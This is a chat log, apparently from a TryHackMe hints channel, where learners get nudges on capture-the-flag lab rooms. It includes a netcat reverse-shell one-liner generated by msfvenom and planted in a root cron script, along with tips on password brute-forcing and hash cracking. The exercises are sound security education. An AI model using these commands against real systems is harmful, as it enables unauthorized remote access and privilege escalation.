#room-hints

WAY past time to sleep

oh, where you from

he's chilling in the uk

as that sounds like my time rn

fair enough

i cant say anything, it being 6am here

can i have a little hint on today's newest box

what part?

i cant find the first username

is just a bit of a guessing game

or is it a bit of dino

dino

in the pictures?

i found the stuff in the source

yes

Look around more, you'll find a hint which pushes you towards login creds

i mean i have the password

should i dirb?

nope

you don't have the right password

you have a password

o.o

@dusky vigil as dumb as it seems, even being so close to the finish line, neither hashcat nor john want to succeed

oh you don't need either of those

huh

you don't need to crack a hash

just need to use what you found to pull flag

omg their making me type this long flag out

oh

im dumb

why am i making life so hard for myself

how dare they

did u get root flag yet?

who?

@tranquil nymph

yup

nie

same

grats

congrats to both of you!

i beat u haha

thanks heh

np

well, it took way too long for me

user was funky, i liked it

ye i do a lot of htb

i started with the whole thing <2 weeks ago

so i saw it immediately

so this was a real challenge

Everyone starts somewhere!

Perks of THM is we're very open to the concept of teaching

is there a way to see times? I completed that kinda fast imo lmao

Not really

you can always time yourself

^

That's what I do

first think in your notes, put a timestamp

my first time exploiting a crontab job to run a msfvenom payload that create a reverse shell and I'm very happy with the outcome. But now I'm just wondering what do I do from here on? When I hit enter it just adds new empty line and does not display anything ;?

just wait?

but it says that command shell session 1 opened

can't I interact with it or something?

@boreal whale what payload did you use on the msfvenom command

You will need to use set payload <msfvenom payload>

in metasploit

Create a payload using: "msfvenom -p cmd/unix/reverse_netcat lhost=LOCALIP lport=8888 R"

set payload cmd/unix/reverse_netcat

I did that :? didn't I; above img

might be a case your payload is bad

by running msfvenom -p cmd/unix/reverse_netcat lhost=LOCALIP lport=8888 R
I got this from it
||mkfifo /tmp/buyrfag; nc 10.10.243.169 8888 0</tmp/buyrfag | /bin/sh >/tmp/buyrfag 2>&1; rm /tmp/buyrfag||

and I just nano that into the crontab job file

just run nc -lvnp 8888

It just generated a simple nc reverse shell

!writeup commonlinuxprivesc

Sorry, there is no writeup for this room.

;/

It's a walkthrough room so won't have one

damn

if you read the tasks

it actually tells you to use nc -lvnp 8888 to catch it

instead of metasploit

I got this
||connect to [10.10.243.169] from (UNKNOWN) [10.10.168.15] 45110||

congrats

you have a shell

i did?
can I interact with it?

try it

it's in front of you 😂

welll
when I hit 'enter' it just create a new black line ;/

ls

what do you expect it to do?

aaaaaaaa

I was expecting to see root@root:~#

nah it's just a sh

whoami reveal root

so, sh would not show ex.: root@root:~#, correct?

yes correct

ty

any hint for 25daysofXmas, Task 9. mcsysadmin's password hash? do i generate it using the password provided?

yes

you create 2 accounts and compare decoded cookies

and based on that you create a cookie to get access to mcsysadmin's account

erm Task 9 is Day 4 which is the linux ssh task

https://tryhackme.com/room/linuxctf
-> How can I find Flag7?

What have you tried?

ps, ps ux, ps aux

Oh, lol. Got is, it was hidden 😅

did anyone finish the Jack room

?

Which jack room we talking @echo thunder

The new one jackofalltrades or the old one Jack

that one with the wordpress blog

Compromise a web server running Wordpress

Ah yeah then I can't help you, have you run wpscan @echo thunder

yes

I enumerate users using wpscan

I wanted to know if the password can be found on the rockyou wordlist

You try any bruteforcing

Personally I would use passwords from the probable wordlists

what lists do you suggest

?

https://github.com/berzerk0/Probable-Wordlists

I like those

thanks

I am currently doing the 13th day of AoC, and there is this optional challenge where i must become Admin to read a file. Do you have any material about privilege escalation on Windows, one that covers just the basic stuff ?

@white salmon not one that would help you with Retro. Just enumerate harder, look around. Everywhere you can.

So I am looking for a file on the system that is executed as Admin/System and that could execute my own command (eg: change admin password) ?

passwd? If not you're going to have to clarify

It's a Windows machine, on which i must execute a program as Admin/system. So I could change the Admin password, add an Admin user, modify my own privileges, etc..
So I was asking if the challenge is to find a way to execute my command with higher privileges

@white salmon nah you need to just keep looking around. You'll find something

okay thanks

I think I found it, thanks for your help :D

anyone have any luck with mrrobot's dictionary list?

tried hydra, wordpress, and burp brute forcing and the length it takes is ridiculous. I peaked at the writeup to see if i was on the right track and verified the PWD was in the dic file but was like 800,000 one. would take days to get to that at the speed these tools work. any suggestions?

are you using the right dictionary @rain sorrel

yes i was using the one on the box @past night. Which i presume exists for a reason f*****y.dic

yup, that's correct

i let it run for over an hour and i was barely on line number 3000

they burried the actual password down at the 800000 line

how many threads are you running ?

also, just use hydra, should be good enough

default. i guess i need to read the man for hydra. wasnt sure i could customize the threads. its a vm so i normally leave it at default

also make sure you allocate enough resources to the box

is it your own vm right?

yea

virtualbox?

anyway, just give it some more ram and cpus to make sure it doesn't clog itself up

okay. any recommendation on tasks per host? i see default is 16. is there usually a golden rule or good practice?

thanks btw

no problem, anytime

idk lol, i usually hand it 32

i just leave the stuff running for longer too

got you. im going to run it again and see what i can do. at the rate i was running it would have been next month

give it more resources to the box too

don't be shy, lol

yea i wanted to leave it on over night but had to keep refreshing the dang time

it's not mandatory i think

i am subscribed so i usually leave my box cracking passwords and use the THM kali for other stuff or the other way round

is it possible to precent my active box from terminating after an hour without having to add an hour?

prevent*

unfortunately not :c

nope

got ya. well the bumping up the threads will help. saved me a week worth of work lol

bruteforcing is lenghty

you can also start cutting down the wordlist size btw

hmmm yea good point

that's a vim thingy, i suck at it

break it up. Lol yea vim is a PITA

so consult the oracle - google.com

keep forgetting the navigating keys

end up jacking up everything

get yourself a cheat sheet for it

so i normally use nano which doesnt help sometimes in a shell

did that for tmux aswell, really useful

people that use vim are on another level

oh definitely

lol yea i aww at ippsec when he casually uses it

i know how to :wq!

I prefer nano over vim

^

I don't need my text editor to be a programming language

can nano work in a shell?

+1 ^, also we are moving away from the subject of the room

yes

Yea

oh okay

oh yea

lol

We can debate text editors in #thm-community-media

#thm-community-media for this

oh god, someone's going to mention emacs next

Steel Mountain I am missing the first word for task 2 item 2 😕 It's really driving me mad because I have all the others (I assume).
Any pointers for that first word only please?

Never mind got it

uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),30(dip),46(plugdev),111(lpadmin),112(sambashare)
Does this mean that the user user is a part of the adm,cdrom,dip,plugdev,lpadmin,sambashare groups?

yes

so how would i go about solving #6 of day4 adventcyber?
"What is the sha1 hash of file8?
The file is basically just this. Decoding from base64 doesn't help either
2oM+RWseZkvUn+oiVFZ/iYzFK/oTKVbpp0WC1vjpKt9uRVYvL5lyjWUG5tYXf1+k
KoM+EFTh7OH7LnvA+eA8jQ==

Yeah. that's not how you work out the SHA1 hash

Google "Linux get sha1 hash"

Google harder @green prism

Googling is not cheating

oh wait

is it just a checksum?

Mhm

why do i always overcomplicate ;(

alright i got day4! It took some lateral thinking to get there

hello guys I cant get a file made in /home folder, task 33, Learn Linux..
I tried linking, copying, touching etc.. is there another way?

I have a hunch

@rotund kraken Not /home

That it might mean your own home folder

You want your home

i.e. ~

ahhh

arigato!

misread

love it, I subsribed today! yeeeeyyy

subscribed*

hahahahaha the dummest thing is is that I already saw the password output 40 times. I didnt realize its the actual password because I thought I had to make a file in /home

thnx guys/girls!

@rotund kraken hehe welcome aboard! you're gonna make a lot of mistakes and sometimes some really basic ones (wink wink MuirlandOracle) , but hey enjoy the journey and the learning process!

@green prism Thank you! Back to the grind!

@inland onyx I am working on Blue and need to crack the password hashes. I am not sure I did it right. I ran hashdump, copied the hashes to a custom file, ran john against the file, but when it ran it didn't show any credentials and now just says "No password hashes left to crack"

I havn't touched jtr in about a month and unfortunately have forgotten a few things

Check the potfile

I'm a hashcat guy, so I can't really remember the command to show them. Might be --show

People keep having issues with this

and it is --show

Definitely get them with cat ~/.john/john.pot

Ah, lovely

Hmm, then I must be off. I did ||john --show temphashes.txt|| but it just prints out the hashes themselves and "3 password hashes cracked, 0 left"

Like I said its been a hot minute, I might of messed up before this step

yeah people have had issues with it

There's an NT hash and an LM hash in there

Try hashcat

Where can I get the newest rockyou.txt?

Github maybe?

"newest"

It's a breach from 2008

It doesn't change

is the one in /usr/share/wordlists/ not good enough?

it's not updated

really?

oh lol. I just saw it in the hint and didnt know if I needed to update

@green prism yes, because it's all one breach from like 2008

https://en.wikipedia.org/wiki/RockYou

2009

WOW good freaking grief. I need to have a written checklist for when I re-build a kali image. It didnt work because on my new VM it didnt pull out the actual rockyou.txt file so john couldnt find it lmfao. Now it worked no problem

Did you try it with the zipped version?..

fun fact

Hydra will work with the compressed version

that's about it

Mhm. Pretty much everything else borks though 😁

No I was just generally messing up. All is right now

Cool, had to terminate and start the machine again to get flag2 but Blue is now done, yay! "Getting Started" is finished!! Now I can move on to "Complete Beginner"

That's EternalBlue for you

Not the room, just the exploit

Yup yup. Nasty bug

hi

hello guys, somebody can help me doing alfred room? i was stuck on meterpreter shell. i didnt get connection back to my handler

Hello Any hint on JackofallTrades

Hi all, i'm on Learn Linux room (beginner's path), i'm stucked at a question because i think i don't understand completely what is requesting me to do:
"This challenge is pretty simple. The binary is checking to see if the environment variable "test1234" exists, and if it's set equal to the current $USER environment variable."

If i try to execute the binary i've got a Core error. I don't understand what the site is requesting me to do, please hints

@terse yew did that spoiler give you what you needed to know?

?? @inland onyx

@terse yew what are you stuck with?

Somebody? I really don't understand what i'm supposed to do

@white salmon set the environment variable, THEN run the binary

port 22 http,port 80 ssh...when i tried to visit http service in browser that is browser restricted service so how can i browse that @inland onyx

@inland onyx so with like export <varname>=<value>, where the varname is the test1234 and the value is the current user?

@white salmon Mhm, but not the current user directly. The contents of the user variable.

@terse yew that is a question for Google. "how to access restricted ports Firefox"

@inland onyx Alright, i think i didn't quite understand this concept of user variable and environments variables

I'll go Google for further investigations

Good idea :+1: 😁

Because honestly i didn't get it at all

User variables are kinda like local variables. They exist only within your current bash session and can't be accessed anywhere else.

Environment variables can be accessed from anywhere. Kinda like global variables in programming, but even wider.

Definitely worth googling though.

Thank you @inland onyx

Though i'll have to google this stuff because it's not clear in my head what are they for

You know when you @inland onyx read and understand a thing, but can't quite pop out a picture of it in your mind, so you aren't able to place it in its right position in the wider scheme

That's where i am 😄

I would suggest experimenting with them then

First i'll have to read further, because for example i can't quite figure out what they are there for, you know. I know it's silly, but when you're autoteaching yourself you often go down in holes like this and have to figure it out

Same thing all variables are there for -- to store information.

Environment variables are used to store things that you need all the time (like your PATH)

They can also be used to store things like passwords to avoid hard coding them into programs, but that's usually done slightly differently.

Wouldn't the system know what my (for example) home path is if they weren't there?

what would happen if the path /home/user/ didn't exist as an environment variable?

That isn't an environment variable

Your PATH isn't /home/user

Try doing echo $PATH

alright, but..

It's a list of places to look for executing programs. Your path is the reason that you can type a command and it executes, without needing the full path. So, for example, ls rather than /usr/bin/ls

My $PATH is..

Ok

Hmm?

I mean the variable $PATH is

a list of paths basically

Basically, yeah

So the $USER variable (sorry, edited)

is it a list of users?

No, the $USER variable stores your username

Current user

How can i see all the environment variables?

How can i list them

ls -a $?

Usually printenv

Alright

So this is what i do.

Printenv something, to see if the variable exist

Referring to the question before

If it doesn't i should export it, where the variable shall be the name of the variable who doesn't yet exist and the value shall be the path of the binary file?

Uh, what do you mean?

Generally speaking if it's a custom variable then it won't already exist

Hi all, i'm on Learn Linux room (beginner's path), i'm stucked at a question because i think i don't understand completely what is requesting me to do:
"This challenge is pretty simple. The binary is checking to see if the environment variable "test1234" exists, and if it's set equal to the current $USER environment variable."

If i try to execute the binary i've got a Core error. I don't understand what the site is requesting me to do, please hint

@inland onyx Was referring to this

If the default ones aren't there then, uh, you've got problems.

Yes. You need to create a new variable and set it equal to $USER

Then run the binary

Why i have to do that in order to run the binary

is it an ownership issue?

Because otherwise it's going to be looking for something that doesn't exist

Giving you a segmentation fault

Like before

This way you are 'tested' on knowledge you gained in previous tasks

Why i have to do that in order to run the binary

Because in the binary is it specified the variable test1234? is it?

This way you are 'tested' on knowledge you gained in previous tasks
@glossy basin Yes Swafox (and good morning!), but knowing how to do a thing isn't knowing Why

Mhm. The binary will be checking to see if test1234 exists and is set to the right thing

it is set to check if variable test1234 is equal to $USER

Because in the binary is it specified the variable test1234? is it?

Alright

Now i've been all the way around and closed the circle

If you get what i mean

yes. i certainly do

Thanks @inland onyx!
Thanks @glossy basin !

https://www.youtube.com/watch?v=DvLFAbxTNJA

😄

how to identify a encoded text like which encoding techinique is used

Experience, mostly, @terse yew . It's difficult at first

I need a hint for the room Jack

the web blog

can anyone help me please?

Enumerate harder. @echo thunder

Look around. What can you find out about the blog?

Users? What blog software is it?

I have the users

enumerated

it is a wordpress

blog

I have the 3 users

These questions are for you to answer for yourself

Don't tell me. This isn't a walkthrough

the passwords for the users can be found on the rockyou

?

I don't know, try it.

You have to put work in

hi guys

I am doing the learning path: Learn Linux can someone hint me task 43? I tried alot like the linking but it didnt work.

!writeup zthlinux

awesome thank you!

Np 🙂

@inland onyx Also I went on and I am stuck in Linux Challenges task 3 #5, find flag 15: when I use hnc** I see 2 hashes but those are not working.. the command u**** -* does not give me money either any nudge here? thanx in advance

Whatever you're doing with the asterisks

You need to escape them

\

h*****lp

ahh oki

got it

if you want to censor things, you could use ||spoiler||

oki ill try

Also I went on and I am stuck in Linux Challenges task 3 #5, find flag 15: when I use h***n***c** I see 2 hashes but those are not working.. the command u** **-* does not give me money either any nudge here? thanx in advance

*djeeezzz finally got it ! thnx @stuck fractal

Normally another 5-10mins on it will get you the answer

Without asking

hmm oki

If you get stuck, try explaining your process out loud. It's called rubber duck debugging

I am srry I meant I got the escaping the asterisks

Ill go ahead and proceed and go back when I finish the rest

Need hint for this please...

It's exactly where it says it is

so to get into root folder i need root privs.. but how to get them ?

it tells me i am not in the sudoers file

It's not magic, you just gotta search

and i cant access sudoers file

Sudo isn't the only way to get root

I mean, that's not really a hint, but ok, Muri :p

@inland onyx Hints, this is before writeups come out

This is nudges

@inland onyx reee bad

Hints channel

This is nudges
@stuck fractal Ah, room-hints 😛

Ach, fine. @raven prism look for unusual files

And if you feel like you need more help, then look at my beloved writeup

you can't undo history, Muri!

😆

(May or may not have completely misread the channel name. Doing a lot of other things at once...)

at reading

says the dyslexic

😛 in these dire times

I cannot afford to burn the bread

only toasting allowed

I feel rich. I just managed to buy milk, eggs and bread

Two of those things are revolting

And one of them is a lot easier to make at home

yes, "managed" and "I"

😂

please don't make "milk" at home, Muri :I

#thm-community-media

yeah yeah, you caught us

In the blue room, I used nmap but it always says all ports filtered

I downloadd th vm for offline use

but when I scan for hosts using nmap it says no hosts up

What room?

blue

Blue.

Blue

Windows box

Will not respond to pings

@white salmon Is your VPN working?

!vpn

Do this room first

yes its working

Can you screenshot the results of ps aux | grep openvpn?

vpn is working, I've used it a few times

could you tell me about using the vm offline?

What do you mean?

The vm for that room is provided

I downloaded it

Mhm

So start it up inside your hypervisor

Then attack it

yes I did and I again got all ports closed

Try it with -Pn

ok

all ports closed

again

Are you scanning the right IP address?

And the machine is definitely up?

Did you give it some time to boot?

Hi Guys, I am on the BrainStorm of this OSCP path and have stuck on it for quite long time. 1. The Nmap yielded 3 ports but I "brute-forced" the answer and the answer is some other number instead, I tried to use different scan but other than this 3 no luck. Are rest of those ports the result of the BoF part? 2. I have managed to get the executable and trying to run it on Win7 32 bit VM but noting pop up. and also on Kali using DosBox and failed to load too. Shall I jump straight to the overflow part?

-p-

did the -p- 20 mins later still 3 ports

Then there is only 3 ports open @umbral ocean

-p- is saying entire port range.

the answer to the question is abit more than 3. and hint is pointing to NMAP so I really got confused by this part..maybe the rest of ports are not applicable at this stage?

is day 18 meant ,from Advent room ,not to be passed?

I am having trouble elevating rights

Day 13.

It's intentionally set up that way

Look in the advent chat and you'll find the solution @white salmon

ok,thx

In Linux Common Privesc it asks what critical file has had its permissions changed and I know what file it is from the hint but I am not sure how they found that out

@white salmon The later task tells you this

Ah okay cool

And why it's had the permissions changed

I'm pretty sure we went over this together the other day

We were talking about SUID if I remember right

But I still had to look over my notes for that today as well 😂

One things for sure I'm not as competent in linux as I thought, but so far really enjoying this "Complete Beginner" learning path

Hi im stuck on question #8 on RP: Web Scanning. i cant see any specific xss alert and certainly nothing matching the answer format. Anyone give me a nudge?

in room Common Linux Privesc , Task6 #2 Having read the information above, what direction privilege escalation is this attack? What mean i don't undertand

Did you read the 2 types of privilege escalation

@north moat

ahh yes thanks i got it now @weary fox

Can someone help me with number 4 on task 9 of Common Linux Privescl.

I am not sure where to start

@weary fox Read through the text with that

ok

This text

Yep

And if you answered the last few questions, you can answer this one

the only files that I found were bin/bash and usr/bin/bashbug

but it has too many characters for the space

Nah you're not understanding something

read the whole task, not just the question

ok

Hello there ! who is agent R ? 😩

enumerate more

i can barely see that

we need a better version of that thing, James. You use it so often, but it's so smol

you really need !dark, or whatever it is

@hazy jewel everyone know what's there

Except the people who needs to know what it is

any hint on windows escalation rights from advent room ?

beside the writeups?

The hint for the question is this but when I look at the paths all I get are these

@stuck fractal

You're really not understanding how it works

no

I don't

The start of that task has 2 sections

What is path and how the exploit works

ok

are any of those paths I posted correct

and also does it start off with echo >/File

this is hints, not answers

Learn and understand

Work out what's happening behind the scenes

Don't brute force the answers

Ok

james! how can i get that? i don't understand the hint. (agentsudo room)

@distant oasis the hint is reverse image searching, and telling you which article to look at

I know the admin password from my previous experience with Juice Shop. In my opinion guessing it is quite hard without any experience in this field, or is it just me? (https://tryhackme.com/room/juiceshop; Task 5)

If I remember correctly I did have the hash of the password from another task I solved before, by guessing it would have taken me really a lot of tries. Is this what you're trying to achieve to improve one's "guessing power"?

And, in general, I think that there's not enough explanation in this room. I do have at least some experience in this field so some of the tasks are quite easy for me but only because I did them before.

Hi im stuck on question #8 on [Task 3] RP: Web Scanning. i cant see any specific xss alert alert tab and certainly nothing matching the answer format. Anyone give me a nudge please? What am i missing?

Hi all guys, i'm stucked in the room Learn Linux, trying to catch the flag containing the password of user shiba4. It's a binary file. I can't seem to find it anywhere

I even manually checked every f. folder

and by the way where did the Room hints section went? It was there this afternoon!

This channel is designed for members of the community to help themselves before asking mentors and mods

As in you ask here, other people who have solved or may know how to help will answer

Well, i'm asking to the general public Paradox

Not specifically to any mod or mentor

But thanks for the hint 😄

And someone from the community will answer 😁

Just clarifying

I hope so

It's somehow very frustrating, i'm sure you know

bruteforcing: does it work if you use the same wordlist for the username as you use it for rhe password?

It does if one of the entries is a username and another of the entries is that user's password. That said, it'd likely work better if you had a username list, as a typical wordlist is centered around common passwords. But that gets a little dicey. A list of usernames is technically a collection personal information and such.

It's theoretically possible given the right wordlist, but it squares the time to exhaust all options

That's how it is for any enumeration or spray attack, though

So, if your wordlist has 16.4 million entries, there's now 16.4 mil * 16.4 mil possibilities

That.. is a big list.

I had colour on my mind

Pink?

256^3

Aight thx guys

or ^4

I forget

transparent isn't a color

After a lot of reading and research I finally figured out what I was doing wrong
Thanks for the help @stuck fractal

Rpmetasploit: how can I find the spool service?

Echoing into ps, then modifying ls. That's not going to work

Different files

Because it's nonsense :p What are you trying to do?

Also that screenshot has answers

Oh sorry

Can someone help me? I tried everything I don't get it.

I mean, you didn't try the right thing :p

ye you right 😄

Follow the description, step by step, and build a mental model of what needs to happen to solve it.

the actual solution isn't complex, you just need the right stack of actions

@thin river pay close attention to the question. It is checking to see if test1234 is set to the $USER variable. Which means if it isn’t working you might need to manually set test1234.

Don’t worry, I got stuck on this too for a minute

You will need to set the variable

It's not set automatically

That's the challenge

like this?

nope

:C

check what you've learned about the environment variables in the task just above @thin river

It is written, if you read accurately. How do you set a new variable?

When you get stuck, it sometimes helps to go back a few steps

by the way i'm always stuck Breadth@

.D

Like everytime/every moment kinda

like this?

Quite

Now read accurately what is requested

is there another way to go around the privilege escalations for windows for day 13 in Advent room?I tired a dozen of them

@white salmon #650425164894568455

have a read

check pins

@Dalosu the binary is checkin If the Variable test1234 exists

now which is the variable and which is the value in that export command

i though cmess room was dun :)this one is even more challenging :)))))))

dfun*

fun*

@white salmon the variable is test1234 and the value is $USER right?

@Dalosu so it's the opposite of what you wrote there, right?

LOL

Try the opposite. I think it won't work

Because, which is the current user? You know that, right?

Shiba2?

yep

Got it @thin river ?

i am constantly discounted from kali is there any reported issue ?

@white salmon #site-support

i wasnt going crazy before zap wasnt showing the xss alert for the question

still isnt when displaying it when scanned, had to see it on the write up so not sure if the issue is my end or not

I know we're meant to stay out of this channel now, but I've seen two people complaining about this issue

I will give it a go for you and check if it's broken for me too

question #8 on [Task 3] RP: Web Scanning

I know it has previously worked

you getting same?

Just scanning now

Nah, I get it with ZAP

@daring elbow @still sail I have made sure the ZAP XSS question still works

It does.

weird i can scan it again and dm you a screenshot ?

@daring elbow yeah, DM me a screenshot

(However it seems it may be kinda buggy for other people)

"A third predominant address type is typically reserved for the router, what is the name of this address type?"

Totally dont remember this

Any hints?

Given the community appears to be asleep just now (we'll usually be staying out of these chats ftr):

Think about what address you'd connect to in order to connect to the internet. It's the address of your router on the network

Begins with a g

Honestly didn't know we called the address that as well. Always just pictured the router(s) themselves in my head. Tyvm

Np

I've ran a vuln scan and a few ps and service scans but still can't find the spool service

Since it's ded, ps will get it

But it's not quite called spool service, it's a shortened version

Spl?

Whenever I'm running ps, it just shows directories

What

Yep

I can run through it rq and dm you a screenshot

Please don't DM me

In meterpreter?

Yep

A third predominant address type is typically reserved for the router, what is the name of this address type?
for some reason I can't figure this 1 out ;/
any hints?

room/bpnetworking

@boreal whale Literally look about ten messages up in the chat

;D

room/rpnmap
How do I set the timing to the max level, sometimes called 'Insane'?
can't find this 1 in nmap -h ;/

There should be numbers 1-5

just found it, :D
thanks

Hi guys, any one can help with learn linux, task 33?

Check the chat history. Someone definitely answered your question

how am i supposed to access the shadow file if the user in challenge 4 (Advent of Cyber) hasn't got the permission?

@autumn sage what is the task 33 anyway

menu greyed out.unhide not saving.im trapped on this room :)
Advemt day 13

done 🙂

Im doing the room https://tryhackme.com/room/crackthehash and Im on the last task but cant seem to format the hash correctly in the file

I've tried <hash>:<salt> where the salt is in ascii but that doesnt seem to work?

@noble zinc have you checked writeup

because it's hard to give hints on that one without giving the answer

yeah

I got the answer but I cant seem to get the format of the hash right to solve it myself

What's the best way to find the username and password in https://tryhackme.com/room/webappsec101, Task 4 #4? I tried using the wordlist mentioned and Turbo Intruder in Burp Suite which made more than 10,000 requests but didn't find any login combination. Is %s correct for both payload positions?

And what is a "flash form" as mentioned in the same room in Task 5 #3?

Hi guys, i'm on Linux Privesc room right now and i have some doubts about what should i do to exploit a cron job,
because i don't necessarily understand how to use msfvenom

My questions is

(related to the snap i posted) From where should i give that msfvenom command to create the payload?

I should give that to the terminal in my own kali, right?

Correct (as far as I understand that)

Alright, then, how am i supposed to echo the payload into the autoscript.sh if it is in the other machine?

I tried that yesterday but the payload in the cronjob didn't connect to my netcat listener. And I still don't know why. It should have.

By copy&pasting the payload

Ok, so from one terminal session (kali my own vm) to the other (sshed into the machine), correct?

msfvenom is putting out some code which you then can paste into the .sh file on the other machine which then, in theory, should be executed every five minutes.

And then go back to my own vm terminal session of kali and start listening on port 8888 to have a reversed shell

right?

You have to make sure that you have one machine which can be reached by the other machine. Running netcat on a local machine in your own private network at home won't work.

Exactly. You just have to make sure that the machine you're exploiting can reach the other machine with the listener on it and that the port you chose os not blocked by a firewall or anything.

But it shouldn't be by default

Let' try

I don't understand. What do you mean?

I mean port 8888 shouldn't be blocked by default

I don't see why it should be

Ah, yes, exactly. Unless you have a firewall of any sort running which is operating in deny all mode.

No firewall, no problems, so to say 😄

And as far as my understanding goes lhost it's me, my own machine, because i'm telling msfvenom to create a payload to give a reverse shell and send it to lhost trough port lport

Just to clarify, right?

That's how I understood it. On the other hand I couldn't get that exploit to work. But the other way round it wouldn't make any sense, would it?

I'm guessing no, because how would the payload content knows where to send the reverse shell otherwise?

msfvenom is for create payload

The payload is being executed on the victim computer thus this computer is connecting to my command & control server which IP the payload has to include.

and cronjob executes things in a determinate time

so

So we input the content of the payload created by msfvenom into the cronjob we want to get a shell from

That's what I think, yes.

The cronjob starts, the reverse shell pops up into our terminal

Exactly

you have to set up a listener with nc

Ok, let's try if i'm luckier than you @gentle cobalt

with the same port you specified in the msfvenom

Thumbs are pressed

If one can say that in English 😄

Anyone can answer my questions regarding webappsec101?

Ok, that looks like a false start

Or maybe not

There's a payload

Isn't it?

Where should i get the content of the payload to input into the cronjob now?

It's really nice to see you all helping each other out in here 😄
Well done!
Remember that if you need it, there is now the second tier of #692465827143876689 if you don't get the answers you need in here or #room-help 🙂

It should have been printed on your stdout, thus your terminal.

Isn't there any code?

It's really nice to see you all helping each other out in here 😄
Well done!
Remember that if you need it, there is now the second tier of #692465827143876689 if you don't get the answers you need in here or #room-help 🙂
@inland onyx Will do, thanks for the heads up

is it the thing that begins with mkfifo?

Yes ^^

I guess so, yes

@white salmon the content should appear in the terminal that you set up a listener

ok /D

That's a really cool payload by the way. A good one to remember for if you don't have msfvenom

Ok, i'll write it down @inland onyx thanks for saying tha

t

Good to know, thanks for the hint.

Worth working to understand it as well though 😆. but yeah, make a note of it

It's more complex than a standard nc reverse shell, but more likely to work in systems that block -e

What's -e Muirland

Explain like i was five

That traditional way of sending a reverse shell with netcat was to do -e /bin/sh -i, if I remember correctly
Been a while since I've done that specifically, given it was blocked off a while back

Either way, -e allowed you to send a command to the listening machine

Netcat stopped it because, uh, people were using it to send reverse shells...

Using a pipe in the form of a fifo gets around that

Also, does this look good to you guys?

Can i save, exit, go back to my terminal in kali and start the listener?

You can -- although there's no use for the last three lines anymore

And i cannot save it, cause permission denied

If i echo the content of the payload

I get this

Try sticking the bit you're trying to echo in quotes

Ok, i'm not the right user to write the file

Ok, i echoed the content of the payload, but i had to bash: /tmp/lireroj: Permission denied rm: remove write-protected regular empty file '/tmp/lireroj'?

Now i've started the listener

Let's see if i get back from it

And... "He kept listening for seventeen thousand years", and... "He became old and gray on the path of linux privesc".. and... "He thought about the good times he had not".. and then "he died upon backlighted keyboard"

;D

Nothings happens at all

go to /etc/cronjob

crontab?

cron.d, cron.daily?

@white salmon http://thecodelesscode.com/case/9 :p a bit unrelated, but yeah

crontab

@bitter crane :D,
allright @white salmon , i'm on it

i've got this */5 root /home/user4/Desktop/autoscript.sh job

scheduled

every minute should execute the script

set up a listener with the same port that you put on the payload

i did

(That'll execute every five minutes 😛 )

true

mb

I'm all in for it

Oh

The autoscript.sh is completely blank now

i've just catted it

It wasn't before, before i echoed it

this bitch

Ok, i rewrote the script as it was now, putting the payload content in it also.

Now i'll restart the listener

"Jimmy said when he was just five years old, you know... Nothing happened at all!"

"One fine morning he putted on a new york station he couldn't believe what i heard at all.. not at all!"

I'm doing musical entertainment from Lou Reed

But nothing happens really.

try to cat the script to be sure you echo it

Looks like it

Oh i see why

I gave the lhost the eth0 value

And not the tun0 value

Which must be the vpn connection

Yeah, now it works.

I mean, i'm receveing stuff now

But not a shell for now. I've got a 10.10.174.110: inverse host lookup failed: Unknown host connect to [10.9.whichisme] from (UNKNOWN) [10.10.174.110] 48510

Yeah that's fine

nc -lvnp

I think the n skips reverse host lookups

Yeah i'm in

It was a silly thing, but it feels nice

Thanks guys

@inland onyx @white salmon @bitter crane (for the poetry) @stuck fractal

hehehe c:

any hint for learn linux box for root flag

The last one?

yeag

yeah

Why can't you get it?

@cursive knoll IDK how far you got but make sure there isn't a 7 in the fixed part of your cookie

Well that was the right person, wrong chat

haha

A third predominant address type is typically reserved for the router, what is the name of this address type? Any hint for that question

all users have no sudo priviledge

in order to do priviledge escalation

There are many ways to escalate privilege

Sudo is only one of them

@noble zinc What role does the router usually play for the hosts on the network?

@inland onyx thanks

hmmm

i can run script like peas

a mediator?

but i see no use to it. makes me a script kiddy

Using tools doesn't make you a script kiddy

Using tools without trying to understand anything does

besides, you gotta crawl before you can walk

this script is too hard to understand

@bitter crane thats true

just keep on trying. Never be satisfied with not knowing, but also give yourself time to learn

👍

I should search the channel before asking lol

missed that chat yesterday :/

Anyone completed the Mr Robot CTF challange I have a question about the challange,
I have finished the challenge now SO I do not need help per-se
When I inspect the page source for the target ip URL I find an IP address there that is unused through out the entire challange. Is this a rabit hole?
I have ran nikto against it as it has port 80 open and pow it's spewing things at me like this
OSVDB-3093: /admin/credit_card_info.php: This might be interesting... has been seen in web logs from an unknown scanner.
I need to know if I am actually allowed to look at this or not?

Can any one help me understand what I am doing wrong. I think that I am using the right command to get the cookies for the server, but it keeps on saying this.

@weary fox Cookies are a part of HTTP headers

They are not a part of the HTTP request body

CURL doesn't show the headers unless you tell it to

You can also use a browser and the devtools to view cookies

ok

(you can put curl into verbose mode to show the headers)

Ok thanks for the help

Got it

Anyone ran into an error like this when trying to migrate processes?

@white salmon Update metasploit

Or downgrade it

it's an MSF bug

Gotcha, I thought it was weird, I literally ran that last night lmao.

hey can someone give me the btc address from this room (Task 3 # 3) website no longer available https://tryhackme.com/room/torforbeginners

@white salmon Nah it's probably available but you don't have something set up

no the website is not available

@white salmon ?

It won't work just in firefox, you need to be connected to TOR and get tor working

I know it's tor

Can you get anything else via tor?

yes

Any other onion sites?

yes

@glossy basin Might need to take a look again

@white salmon thank you for reporting, currently looking into it

[Fixed that]

Day 18 Advent Room,not able to connect to the machine:3000

any known problems

vpn is up

how can i exploit microsoft iis httpd 10?

@white salmon I could connect yesterday, try letting it a bit more time

i postponed the task for later

Does anyone know if the day18 of AoC is still up to get the cookie ? I have everything set up, but it doesn't seem like the admin is going to connect/has connected (for more than 20m now). If it isn't maintained, is there still a way to complete the challenge ?

Good morning hackers.
Does anyone know what room covers attacking a metasploitable box? I see a badge for it

Since I have it, it's one of the basic rooms. probably one on RP

https://tryhackme.com/room/rpmetasploit

That one does say it has a badge, but Idk if the rooms actually say they give a badge.

I did the really basic Metasploit one last night 🙂

afaik all rooms that give badges say so in the little awards thing

I've spent a good 1 hour on and off on this question

For metasploit

look at the 'options' and find it

options for set?

yes

I did before and didn't see the answer

I'm stuck with some of the tasks in https://tryhackme.com/room/webappsec101.

Task 5, #3: I found the Flash file but only in the Target view of Burp. On which page is it being loaded and does Firefox interpret that at all?

